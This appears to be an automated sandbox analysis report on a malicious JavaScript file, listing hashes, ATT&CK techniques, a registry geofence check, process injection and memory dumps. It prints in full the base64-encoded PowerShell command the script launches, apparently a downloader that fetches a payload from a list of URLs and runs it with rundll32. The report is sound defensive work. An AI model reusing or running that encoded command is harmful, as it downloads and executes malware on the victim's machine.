1e567b4015164976fee603e26a6bff005f1d0bee5c66f2b55c5a715d318a3699

General

Target

cz3EfRwcgvveH.js
Size

345KB
MD5

35ce6e13e1f3b40f19dd2e7c2f4d8bda
SHA1

f314f524514b951d1c05c108c0ed7739c1d77331
SHA256

1e567b4015164976fee603e26a6bff005f1d0bee5c66f2b55c5a715d318a3699
SHA512

12b7779c9b55ae9a98b87015c092b1f9a2f27458c655d6cdadb08583f8b90a615be3fa637bd85c7d371702d14f96be0a88407748ac663294d168b61d42e02109
SSDEEP

6144:bSfr0dh2tgcH6YTkM0cNRcpZwg/EBQ+8N/ygD1pRbxVvALN5IAbghS:bSfrSh2tgcH6YTkMXRcpZwg/QQ+I/ygQ

Score

8^/10

Malware Config

Signatures

Blocklisted process makes network request 1 IoCs

flow	pid	Process
30	1356	powershell.exe

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-2548970870-3691742953-3895070203-1000\Control Panel\International\Geo\Nation	wscript.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious behavior: EnumeratesProcesses 2 IoCs

pid	Process
1356	powershell.exe
1356	powershell.exe

Suspicious use of AdjustPrivilegeToken 1 IoCs

description	pid	Process
Token: SeDebugPrivilege	1356	powershell.exe

Suspicious use of WriteProcessMemory 2 IoCs

description	pid	Process	procid_target
PID 4532 wrote to memory of 1356	4532	wscript.exe	83
PID 4532 wrote to memory of 1356	4532	wscript.exe	83

C:\Windows\system32\wscript.exe
wscript.exe C:\Users\Admin\AppData\Local\Temp\cz3EfRwcgvveH.js
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:4532
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -encodedcommand "JAB2AGEAbgBlAHMAcwBhAFMAaABhAGkAawBoACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQgBqAEEARwA4AEEAYgBnAEIAMABBAEgASQBBAFkAUQBCAHcAQQBHADgAQQBjAHcAQgBwAEEASABRAEEAYQBRAEIAdgBBAEcANABBAEwAZwBCAGsAQQBHADgAQQBkAHcAQgB1AEEARwB3AEEAYgB3AEIAaABBAEcAUQBBACIAOwAkAHAAZQByAHMAaQBzAHQAZQByAHMARABvAGwAYQBiAHIAYQB0AGUAIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBEAEkAQQBOAEEAQQB6AEEAQwA0AEEATQBnAEEAeABBAEQAQQBBAEwAZwBBAHgAQQBEAE0AQQBNAFEAQQB1AEEARABRAEEATQBBAEEAPQB6AHEARQBEAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEIAWABBAEcAZwBBAGEAUQBCAHMAQQBHAFUAQQBaAFEAQgB1AEEARgBJAEEAWgBRAEIAdQBBAEgAVQBBAGIAZwBCAGoAQQBHAGsAQQBZAFEAQgAwAEEARwA4AEEAYwBnAEIANQBBAEMANABBAFoAdwBCAHMAQQBHADgAQQBZAGcAQgBoAEEARwB3AEEAIgA7ACQAQwBoAGkAdgBlAHMAVQBuAHAAcgBpAG0AaQB0AGkAdgBlAG4AZQBzAHMAIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBCAFEAQQBHAGcAQQBlAFEAQgBzAEEARwA4AEEAWgB3AEIAbABBAEcANABBAGEAUQBCAHoAQQBIAFEAQQBMAGcAQgBqAEEASABJAEEAWgBRAEIAawBBAEcAawBBAGQAQQBBAD0AUgByAD0ASABhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBEAGsAQQBOAHcAQQB1AEEARABnAEEATwBBAEEAdQBBAEQASQBBAE0AdwBBAHcAQQBDADQAQQBPAEEAQQA0AEEAQQA9AD0AIgA7ACQASQBuAGMAcgBhAHMAaABBAHAAbABhAG4AYQB0AGkAcwBtACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARQA0AEEAZABRAEIAdABBAEcAVQBBAGMAZwBCAHYAQQBIAE0AQQBaAFEAQgBUAEEARwBnAEEAYgB3AEIAdgBBAEcAcwBBAGMAdwBBAHUAQQBHADAAQQBiAHcAQgBpAEEARwBrAEEATAB3AEIANgBBAEMAOABBAFcAUQBBAD0AeQBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBHADQAQQBZAFEAQgB5AEEARwBNAEEAYgB3AEIAbwBBAEgAawBBAGMAQQBCAHUAQQBHADgAQQBkAEEAQgBwAEEARwBNAEEATABnAEIAagBBAEcAOABBAGIAdwBCAHMAQQBDADgAQQBZAFEAQQB2AEEARABNAEEAWQBRAEIAWABBAEEAPQA9AHkAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQB5AEEARABFAEEATQBnAEEAdQBBAEQARQBBAE0AdwBBAHgAQQBDADQAQQBNAGcAQQB4AEEARABZAEEATABnAEEAeQBBAEQARQBBAE4AZwBBAHYAQQBIAGcAQQBSAGcAQQB2AEEARQBFAEEAeQBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBAHgAQQBEAE0AQQBOAEEAQQB1AEEARABJAEEATQBnAEEAeQBBAEMANABBAE4AUQBBAHcAQQBDADQAQQBOAEEAQQA1AEEAQwA4AEEAWgBnAEEAdgBBAEcAUQBBAGEAUQBCAFgAQQBIAGsAQQBOAGcAQQA9AHkAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQAwAEEARABVAEEATABnAEEAeABBAEQASQBBAE0AZwBBAHUAQQBEAEUAQQBNAFEAQQAwAEEAQwA0AEEATwBBAEEAMwBBAEMAOABBAGIAUQBCAHUAQQBIAFkAQQBMAHcAQQA0AEEAQQA9AD0AeQBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBFAGcAQQBaAFEAQgBtAEEASABRAEEAWgBRAEIAeQBBAEUANABBAGIAdwBCAHUAQQBHAFUAQQBiAGcAQgBrAEEARwA4AEEAZAB3AEIAdABBAEcAVQBBAGIAZwBCADAAQQBDADQAQQBaAHcAQgB2AEEARwB3AEEAWgBnAEEAdgBBAEYARQBBAEwAdwBBADUAQQBHAGcAQQBZAGcAQgBYAEEAQQA9AD0AeQBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBAHgAQQBEAGsAQQBNAGcAQQB1AEEARABFAEEATQBnAEEAeABBAEMANABBAE0AUQBBADMAQQBDADQAQQBOAHcAQQB3AEEAQwA4AEEAWQB3AEIARQBBAEYATQBBAGQAUQBCAEgAQQBHAEkAQQBMAHcAQQA1AEEASABvAEEATgBBAEIAbgBBAEQAVQBBAGEAZwBCADYAQQBIAFUAQQBPAEEAQgBQAEEAQQA9AD0AeQBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBAHgAQQBEAGsAQQBNAGcAQQB1AEEARABFAEEATQBnAEEAeABBAEMANABBAE0AUQBBADMAQQBDADQAQQBOAGcAQQA1AEEAQwA4AEEATgB3AEIANABBAEgAWQBBAGIAZwBCAG8AQQBEAEUAQQBXAFEAQQB2AEEARABFAEEAYQBnAEIAUABBAEcAYwBBAE4AQQBCAEQAQQBFAFUAQQBPAEEAQQA9AHkAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQB4AEEARABrAEEATQBnAEEAdQBBAEQARQBBAE0AZwBBAHgAQQBDADQAQQBNAFEAQQAzAEEAQwA0AEEATQBRAEEAMABBAEMAOABBAE8AQQBCAEMAQQBIAG8AQQBMAHcAQgB5AEEARwBVAEEAZQBRAEEAMgBBAEQARQBBAFQAQQBCAFEAQQBHAHcAQQBjAEEAQgBVAEEAQQA9AD0AIgA7ACQAcwBoAGkAcAB3AHIAaQBnAGgAdABzAEMAbwB1AG4AdABlAHIAcwBsAG8AcABlACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARQBrAEEAYgBnAEIAeQBBAEcAawBBAFoAdwBCAG8AQQBIAFEAQQBaAFEAQgBrAEEARQBRAEEAWQBRAEIAdABBAEcARQBBAFoAdwBCAGwAQQBHAEUAQQBZAGcAQgBzAEEARwBVAEEATABnAEIAagBBAEcAOABBAGIAUQBBAD0ATQBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBHAFEAQQBhAFEAQgB6AEEARwBVAEEAYgBRAEIAdwBBAEcAdwBBAGIAdwBCADUAQQBDADQAQQBiAEEAQgBsAEEARwBjAEEAWQBRAEIAcwBBAEEAPQA9AE0AYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEASABVAEEAYgBBAEIAMABBAEgASQBBAFkAUQBCAHAAQQBHADQAQQBkAGcAQgB2AEEARwB3AEEAZABnAEIAbABBAEcAUQBBAFYAdwBCAHYAQQBIAEkAQQBaAEEAQgB6AEEASABRAEEAWgBRAEIAeQBBAEMANABBAGQAdwBCAGwAQQBHAEkAQQBjAHcAQgBwAEEASABRAEEAWgBRAEEAPQAiADsAJAB1AG4AYwBvAG0AcAByAGUAaABlAG4AcwBpAHYAZQAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEgASQBBAFoAUQBCAGoAQQBHAEUAQQBkAEEAQgBoAEEARwB3AEEAYgB3AEIAbgBBAEgAVQBBAGEAUQBCAHUAQQBHAGMAQQBXAEEAQgBwAEEASABBAEEAYQBBAEIAcABBAEgAVQBBAGMAdwBBAHUAQQBHAE0AQQBiAHcAQgB2AEEARwB3AEEARgBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBEAEUAQQBPAFEAQQAxAEEAQwA0AEEATgBBAEEANABBAEMANABBAE0AUQBBADAAQQBEAEUAQQBMAGcAQQB4AEEARABjAEEATwBRAEEAPQAiADsAJABwAGkAbgBjAGgAYQBiAGwAZQAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEcAVQBBAGQAUQBCAHcAQQBHAGcAQQBZAFEAQgAxAEEASABNAEEAYQBRAEIAaABBAEMANABBAGEAdwBCAGgAQQBIAFUAQQBaAGcAQgBsAEEARwA0AEEAaABlAFgAbABhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBEAEUAQQBNAGcAQQB4AEEAQwA0AEEATQBRAEEAMwBBAEQAWQBBAEwAZwBBAHkAQQBEAE0AQQBOAEEAQQB1AEEARABRAEEATQBRAEEAPQAiADsAZgBvAHIAZQBhAGMAaAAgACgAJABtAGUAdABhAGwAZQBkACAAaQBuACAAJABJAG4AYwByAGEAcwBoAEEAcABsAGEAbgBhAHQAaQBzAG0AIAAtAHMAcABsAGkAdAAgACIAeQAiACkAIAB7AHQAcgB5ACAAewAkAE0AaQBjAHIAbwBuAHMASQBuAHYAaQBhAGIAaQBsAGkAdAB5ACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQgAzAEEARwBVAEEAWQBRAEIAMABBAEcAZwBBAFoAUQBCAHkAQQBHAEkAQQBjAGcAQgBsAEEARwBFAEEAYQB3AEIAVgBBAEcANABBAGIAUQBCAHYAQQBHAFEAQQBaAFEAQgB6AEEASABRAEEAYgBBAEIANQBBAEMANABBAFkAdwBCAHkAQQBHAFUAQQBaAEEAQgBwAEEASABRAEEAWQB3AEIAaABBAEgASQBBAFoAQQBBAD0AbABhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBGAE0AQQBhAHcAQgBsAEEARwB3AEEAZABBAEIAdgBBAEcANABBAGEAUQBCAGoAQQBHAEUAQQBiAEEAQgBIAEEASABVAEEAYgBnAEIAMABBAEcAVQBBAGMAZwBBAHUAQQBHAE0AQQBiAHcAQgAxAEEARwA0AEEAZABBAEIAeQBBAEgAawBBAGwAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEASABNAEEAYgB3AEIAagBBAEcAawBBAGIAZwBCAHAAQQBHAEUAQQBiAGcAQgBwAEEASABNAEEAZABBAEIAcABBAEcATQBBAEwAZwBCAG4AQQBIAEkAQQBhAFEAQgB3AEEARwBVAEEAbABhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBADEAQQBEAE0AQQBMAGcAQQAyAEEARABFAEEATABnAEEAeABBAEQAZwBBAE4AQQBBAHUAQQBEAEUAQQBOAGcAQQA1AEEAQQA9AD0AIgA7ACQAaABvAHIAbgBzAHQAbwBuAGUASABvAG0AZQBiAG8AZABpAGUAcwAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAMQBBAEQAQQBBAEwAZwBBAHgAQQBEAFUAQQBNAEEAQQB1AEEARABFAEEATgBBAEEAMQBBAEMANABBAE0AUQBBADIAQQBEAFkAQQAiADsAJABUAGkAbgB0AGUAcgBzACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARABFAEEATwBRAEEAMgBBAEMANABBAE4AZwBBADMAQQBDADQAQQBNAFEAQQB6AEEARABnAEEATABnAEEANABBAEQAQQBBACIAOwAkAFAAYQBuAGkAbwBuAGkAYQBNAGkAbgBpAHMAdABlAHIAaQB1AG0AIAA9ACAAWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBuAGkAYwBvAGQAZQAuAEcAZQB0AFMAdAByAGkAbgBnACgAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACQAbQBlAHQAYQBsAGUAZAApACkAOwBJAG4AdgBvAGsAZQAtAFcAZQBiAFIAZQBxAHUAZQBzAHQAIAAkAFAAYQBuAGkAbwBuAGkAYQBNAGkAbgBpAHMAdABlAHIAaQB1AG0AIAAtAE8AIABDADoAXABcAFAAcgBvAGcAcgBhAG0ARABhAHQAYQBcAFwAdQBuAGEAbQBwAGwAeQBMAGEAbgBpAGYAbABvAHIAbwB1AHMALgBTAHUAYgBpAG4AZABpAGMAYQB0AGUAUgBvAHAAZQB0AHIAaQBjAGsAOwAkAGEAbABsAG8AdAByAG8AcABoAGkAYwBIAGUAbQBhAHQAbwBjAGwAYQBzAGkAcwAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEIATgBBAEcAOABBAGIAZwBCAHYAQQBIAEEAQQBhAEEAQgB2AEEARwA0AEEAYQBRAEIAbABBAEgATQBBAFMAQQBCADUAQQBIAEEAQQBaAFEAQgB5AEEARwA4AEEAZQBBAEIANQBBAEcAYwBBAFoAUQBCAHUAQQBHAGsAQQBlAGcAQgBwAEEARwA0AEEAWgB3AEEAdQBBAEcAWQBBAGQAUQBCADAAQQBHAEkAQQBiAHcAQgBzAEEAQQA9AD0AIgA7ACQAYQBkAGUAbQBwAHQAQQBiAGIAbwB0AG4AdQBsAGwAaQB1AHMAIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBEAEUAQQBNAFEAQQB3AEEAQwA0AEEATQBRAEEAMgBBAEQASQBBAEwAZwBBAHgAQQBEAFUAQQBOAGcAQQB1AEEARABFAEEATwBRAEEAMQBBAEEAPQA9AHgAdQBCAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEQARQBBAE0AUQBBADAAQQBDADQAQQBNAGcAQQAwAEEARABVAEEATABnAEEAeABBAEQATQBBAE0AQQBBAHUAQQBEAEUAQQBNAHcAQQAyAEEAQQA9AD0AIgA7AGkAZgAgACgAKABHAGUAdAAtAEkAdABlAG0AIAAtAFAAYQB0AGgAIABDADoAXABcAFAAcgBvAGcAcgBhAG0ARABhAHQAYQBcAFwAdQBuAGEAbQBwAGwAeQBMAGEAbgBpAGYAbABvAHIAbwB1AHMALgBTAHUAYgBpAG4AZABpAGMAYQB0AGUAUgBvAHAAZQB0AHIAaQBjAGsAKQAuAEwAZQBuAGcAdABoACAALQBnAGUAIAAyADMAMgA2ADcANgApAHsAcABvAHcAZQByAHMAaABlAGwAbAAgAC0AZQBuAGMAbwBkAGUAZABjAG8AbQBtAGEAbgBkACAAIgBjAHcAQgAwAEEARwBFAEEAYwBnAEIAMABBAEMAQQBBAGMAZwBCADEAQQBHADQAQQBaAEEAQgBzAEEARwB3AEEATQB3AEEAeQBBAEMAQQBBAFEAdwBBADYAQQBGAHcAQQBVAEEAQgB5AEEARwA4AEEAWgB3AEIAeQBBAEcARQBBAGIAUQBCAEUAQQBHAEUAQQBkAEEAQgBoAEEARgB3AEEAZABRAEIAdQBBAEcARQBBAGIAUQBCAHcAQQBHAHcAQQBlAFEAQgBNAEEARwBFAEEAYgBnAEIAcABBAEcAWQBBAGIAQQBCAHYAQQBIAEkAQQBiAHcAQgAxAEEASABNAEEATABnAEIAVABBAEgAVQBBAFkAZwBCAHAAQQBHADQAQQBaAEEAQgBwAEEARwBNAEEAWQBRAEIAMABBAEcAVQBBAFUAZwBCAHYAQQBIAEEAQQBaAFEAQgAwAEEASABJAEEAYQBRAEIAagBBAEcAcwBBAEwAQQBCAHQAQQBIAFUAQQBjAHcAQgAwAEEARABzAEEAIgA7ACQATgBvAHMAaQBuAGcAUABvAGwAeQBoAGEAcgBtAG8AbgB5ACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQgBaAEEARwBFAEEAZAB3AEIAdwBBAEcAVQBBAGMAZwBBAHUAQQBIAFkAQQBaAFEAQgB1AEEASABRAEEAZABRAEIAeQBBAEcAVQBBAGMAdwBBAD0AcgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBAHgAQQBEAEkAQQBNAFEAQQB1AEEARABrAEEATwBBAEEAdQBBAEQAYwBBAE0AUQBBAHUAQQBEAEUAQQBOAFEAQQAxAEEAQQA9AD0AIgA7ACQAQgBlAG4AZQBmAGEAYwB0AG8AcgAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEIAegBBAEgAUQBBAGIAdwBCAHUAQQBHAFUAQQBaAGcAQgBzAEEARwBrAEEAWgBRAEIAegBBAEMANABBAFkAdwBCAGgAQQBIAEEAQQBhAFEAQgAwAEEARwBFAEEAYgBBAEEAPQBoAHcAcgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBCAG4AQQBHAEUAQQBkAFEAQgB6AEEASABNAEEAYgBRAEIAbABBAEgAUQBBAFoAUQBCAHkAQQBDADQAQQBhAEEAQgBsAEEARwBFAEEAYgBBAEIAMABBAEcAZwBBAFkAdwBCAGgAQQBIAEkAQQBaAFEAQQA9ACIAOwAkAFMAbwBvAHQAaABpAG4AZwBQAGUAZQBwAHMAaABvAHcAIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBHADAAQQBhAFEAQgB6AEEASABRAEEAZABRAEIAdQBBAEcAVQBBAEwAZwBCAGwAQQBHADQAQQBaAHcAQgBwAEEARwA0AEEAWgBRAEIAbABBAEgASQBBAGEAUQBCAHUAQQBHAGMAQQAiADsAYgByAGUAYQBrADsAfQB9ACAAYwBhAHQAYwBoACAAewB9AH0A"
  2⤵
  - Blocklisted process makes network request
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:1356

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

1

T1012

System Information Discovery

2

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_z5wji3zu.g3w.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
memory/1356-133-0x00000153EF7A0000-0x00000153EF7C2000-memory.dmp

Filesize
136KB

Download
memory/1356-144-0x00000153EF810000-0x00000153EF820000-memory.dmp

Filesize
64KB

Download
memory/1356-143-0x00000153EF810000-0x00000153EF820000-memory.dmp

Filesize
64KB

Download
memory/1356-145-0x00000153EF810000-0x00000153EF820000-memory.dmp

Filesize
64KB

Download

Analysis

Sharing